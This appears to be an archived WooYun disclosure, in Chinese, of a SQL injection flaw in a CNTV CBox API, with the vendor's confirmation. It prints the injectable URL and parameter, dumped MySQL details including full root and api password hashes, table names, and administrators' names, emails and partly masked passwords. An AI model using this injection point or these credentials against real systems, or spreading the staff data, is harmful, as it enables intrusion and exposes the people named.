乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-12-17: 细节已通知厂商并且等待厂商处理中 2013-12-17: 厂商已经确认,细节仅向厂商公开 2013-12-27: 细节向核心白帽子及相关领域专家公开 2014-01-06: 细节向普通白帽子公开 2014-01-16: 细节向实习白帽子公开 2014-01-31: 细节向公众公开
RT
1)测试注入点如下,存在注入的参数为columnid;
http://api.cbox.cntv.cn/api/column_detail?pid=ukztYUybsWanMQcNKADef2gE9piG4h6d&version=1.0.4&columnid=C10336
2)数据库相关信息;
DB Server: MySQL >=5Current User: api@cms24Sql Version: 5.1.61-logCurrent DB: mvsSystem User: [email protected]Host Name: cboxup9DB User & Pass: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:localhost api:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9:10.7.3.%Data Bases: information_schema mvs mysql test
相关表信息:
VMS_COLUMN VMS_COLUMN_PENDING VMS_VIDEOINFO VMS_VIDEOINFO_PENDING VMS_VIDEOSET VMS_VIDEOSET_PENDING VMS_VIDEOSET_VIDEO_RELATION VMS_VIDEOSET_VIDEO_RELATION_PENDING YXG_CHANNEL mvs_area mvs_channel mvs_client mvs_client_home_subject mvs_client_television_stream mvs_client_type mvs_client_version mvs_client_version_channel mvs_content_type mvs_device mvs_epg mvs_feedback mvs_feedback_video mvs_focus_video mvs_home_subject mvs_home_subject_content mvs_media_type mvs_out_service_template mvs_player_recommend_content mvs_push_msg mvs_right mvs_role mvs_role_right_relation mvs_second_channel mvs_stat_area mvs_stat_basic mvs_stat_search mvs_stat_video mvs_subject_type mvs_syslogs mvs_syslogs_optype mvs_television_station mvs_user mvs_year stat_navigationbar stat_search stat_startup stat_video stat_vv
管理员信息:
id user_name user_password user_email5 caojundan xxxxx3456 [email protected]11 zhaoxuesong cxxxxxxer... [email protected]14 wangxinli qwxxxxx) [email protected]15 zhangjianan 4exxxxxtiao [email protected]16 rentao Cb0xxxxx3 [email protected]17 tanxiaoqiang Cbxxxxx3 [email protected]
见详细说明
过滤
危害等级:高
漏洞Rank:15
确认时间:2013-12-17 17:21
非常感谢,我们将尽快进行该业务的整改!~~感谢您对我们的支持和帮助!~~~
暂无